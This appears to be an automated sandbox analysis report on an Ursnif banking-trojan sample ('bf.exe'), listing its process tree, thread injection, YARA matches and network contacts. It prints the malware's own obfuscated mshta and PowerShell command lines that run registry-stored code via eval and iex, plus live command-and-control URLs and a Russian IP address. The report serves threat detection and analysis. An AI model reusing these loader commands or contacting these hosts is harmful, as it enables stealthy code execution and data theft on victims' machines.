Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 29561580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 29561580 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ffsw='wscript.shell';resizeto(0,2);eval(new activexobject(ffsw).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring((rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring((rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn)) Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" Jump to behavior
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.711857959.00000000086BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.676177436.0000000005910000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.666643189.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723069999.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.696674053.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\bf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\control.exe Code function: 12_2_004963E0 CreateMutexExA,GetUserNameA, 12_2_004963E0

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 722154 Sample: bf.exe Startdate: 13/10/2022 Architecture: WINDOWS Score: 100 40 trackingg-protectioon.cdn1.mozilla.net 2->40 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 8 other signatures 2->52 9 bf.exe 6 2->9         started        13 mshta.exe 19 2->13         started        signatures3 process4 dnsIp5 42 45.8.158.104, 49696, 80 ASBAXETNRU Russian Federation 9->42 44 trackingg-protectioon.cdn1.mozilla.net 9->44 54 Writes to foreign memory regions 9->54 56 Modifies the context of a thread in another process (thread injection) 9->56 58 Maps a DLL or memory area into another process 9->58 60 2 other signatures 9->60 15 control.exe 9->15         started        18 powershell.exe 1 26 13->18         started        signatures6 process7 file8 34 C:\Users\user\AppData\...\4rgoqrxw.cmdline, Unicode 18->34 dropped 62 Creates a thread in another existing process (thread injection) 18->62 21 csc.exe 3 18->21         started        24 csc.exe 3 18->24         started        26 conhost.exe 18->26         started        28 explorer.exe 18->28 injected signatures9 process10 file11 36 C:\Users\user\AppData\Local\...\4rgoqrxw.dll, PE32 21->36 dropped 30 cvtres.exe 1 21->30         started        38 C:\Users\user\AppData\Local\...\n2sgiaoa.dll, PE32 24->38 dropped 32 cvtres.exe 1 24->32         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.8.158.104
 unknown Russian Federation
49392 ASBAXETNRU true

Contacted Domains

Name IP Active
trackingg-protectioon.cdn1.mozilla.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.8.158.104/uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct true
  • Avira URL Cloud: safe
 unknown
http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct true
  • Avira URL Cloud: safe
 unknown